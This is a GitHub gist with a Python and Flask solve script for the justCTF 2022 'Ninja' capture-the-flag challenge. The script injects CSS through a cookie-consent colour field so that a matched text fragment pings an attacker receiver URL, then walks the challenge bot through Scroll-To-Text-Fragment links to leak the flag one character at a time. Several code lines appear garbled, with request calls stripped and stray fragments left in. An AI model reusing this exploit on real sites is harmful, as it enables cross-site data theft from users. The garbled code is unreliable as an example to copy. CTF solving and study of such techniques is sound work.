Skip to content

Instantly share code, notes, and snippets.

Created June 12, 2022 17:22
Show Gist options
  • Save haqpl/52455c8ddfec33aeefb468301d70b6eb to your computer and use it in GitHub Desktop.
Save haqpl/52455c8ddfec33aeefb468301d70b6eb to your computer and use it in GitHub Desktop.
justCTF22 - Ninja
from flask import Flask
from flask import request
import string
import requests
from bs4 import BeautifulSoup
URL = ""
proxy = {}
all_chars = string.ascii_lowercase + '_' + '}'
s = requests.Session()
won = False
i = 0
flag = "justCTF{"
def retrive_csrf(page):
resp = s.get(f"{URL}/{page}", proxies=proxy).text
return BeautifulSoup(resp, "html.parser").find_all('input')[0].attrs.get('value')
def register(username, password):
resp = s.get(f"{URL}/register", proxies=proxy).text
csrf_token = retrive_csrf("register")
burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Register"}"{URL}/register", data=burp0_data, proxies=proxy)
def login(username, password):
csrf_token = retrive_csrf("login")
burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Sign In"}"{URL}/login", data=burp0_data, proxies=proxy)
def consent(title, css_payload, link):
csrf_token = retrive_csrf("consents")
burp0_data = {"csrf_token": csrf_token, "title": title, "color_palette": css_payload, "link": link, "submit": "Generate cookie consent"}
resp ="{URL}/consents", data=burp0_data, proxies=proxy).text
return BeautifulSoup(resp, "html.parser").find('a',text=title)['href'].split('/')[2].split('?')[0]
def setup():
global note_id
user, pwd = 'haqpl', 'haqpl'
register(user, pwd)
login(user, pwd)
# CSS style applied to the matched STTF with ping back to us
css_payload = f"#FFFFFF;}} :target::before {{ content : url({RECEIVER}/hit)"
# Ninja Cookie gadget on which bot will click after visit, triggering STTF
sttf = ':~:text=Hello" class="lg-cc lg-cc__button_type_clear'
note_id = consent('win', css_payload, sttf)
app = Flask(__name__)
def gen_redirect(c):
global flag, note_id, i
print("Current char: ", all_chars[i-1])
context |-------match-----| context
payload = f"""
const c = "{c}";
var flag = "{flag}";
const sleep = d => new Promise(r=>setTimeout(r,d));
window.onload = async () => {{
//try to match subsequent flag characters
payload = `:~:text=${{flag}}-,${{c}}" class="lg-cc lg-cc__button_type_clear"`;
myk ='{URL}/consent/{note_id}?link='+encodeURIComponent(payload));
await sleep(100);
return payload
def redirect():
global i, won
return gen_redirect(all_chars[i-1]) if (not won and len(all_chars)>i-1) else "Thank you for cooperation"
def receiver():
global i, flag, won
leaked = all_chars[i-1]
print("Current flag:", flag)
if leaked == "}":
won = True
return "ok"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment